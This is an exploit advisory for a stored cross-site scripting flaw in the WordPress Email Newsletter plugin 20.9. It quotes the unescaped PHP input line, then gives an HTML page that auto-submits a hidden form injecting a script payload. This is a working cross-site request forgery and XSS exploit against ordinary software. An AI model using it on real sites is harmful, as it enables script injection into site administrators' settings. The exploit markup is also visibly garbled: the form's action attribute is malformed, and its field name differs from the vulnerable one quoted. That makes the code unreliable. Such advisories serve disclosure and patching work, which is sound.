######################
# Exploit Title : WordPress Email Newsletter 20.9 Cross-Site Scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : https://wordpress.org/plugins/email-newsletter/
# Software Link : https://downloads.wordpress.org/plugin/email-newsletter.20.9.zip
# Date : 2015-01-03
# Tested on : Windows 7 / Mozilla Firefox
######################

######################
# Vulnerable code :
<input name="eemail_from_name" id="eemail_from_name" type="text"value="<?php echo $eemail_from_name; ?>" maxlength="150" size="50" />
# The stored value is echoed straight into the value attribute without attribute escaping (e.g. esc_attr()), so a double quote in it closes the attribute and the rest is rendered as markup; escaping the output is the fix.
#####################

Exploit Code:

<html>
<body>
<form name="eemail_form" method="post"_email_setting()" >
<input name="eemail_from_email" id="eemail_from_email" type="hidden"value='"><script>alert(1)</script>' maxlength="150" size="50" />
<script language="Javascript">
setTimeout('eemail_form.submit()', 1);
</script>
</body>
</html>